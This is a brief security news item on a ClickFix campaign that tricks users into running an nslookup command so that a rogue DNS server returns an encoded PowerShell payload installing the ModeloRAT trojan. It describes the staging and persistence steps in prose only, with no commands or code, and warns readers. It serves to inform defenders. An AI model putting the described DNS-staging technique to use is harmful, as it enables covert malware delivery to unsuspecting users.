16.02.2026
2 min
326
Microsoft researchers have uncovered a dangerous new variant of ClickFix attacks that, for the first time, utilizes DNS queries as a channel for malware delivery. Victims are tricked into running an nslookup command that queries an attacker-controlled DNS server, retrieving a malicious PowerShell script that eventually installs the ModeloRAT remote access trojan.
Unlike traditional ClickFix campaigns that rely on HTTP, this version abuses DNS lookup mechanisms. Victims are instructed to enter a specific command into the Windows Run dialog. This command triggers a lookup to a rogue DNS server, which returns a “NAME:” field containing the encoded PowerShell payload. Once executed, the script deploys a Python runtime, establishes persistence via the startup folder, and grants attackers full remote control of the compromised system.
ClickFix campaigns rely heavily on social engineering, convincing users that their browser or OS has an error that requires a manual “fix”. These attacks have evolved rapidly, with threat actors recently leveraging fake ChatGPT pages, Grok, Claude Artifacts, and even Pastebin comments to distribute malicious scripts. The shift to DNS traffic represents a significant step in evasion tactics.
By using DNS responses to stage malware, attackers can bypass traditional web filters and blend in with normal network traffic. Users are strongly advised never to copy-paste and execute commands from untrusted websites, regardless of how convincing the “error message” may appear.
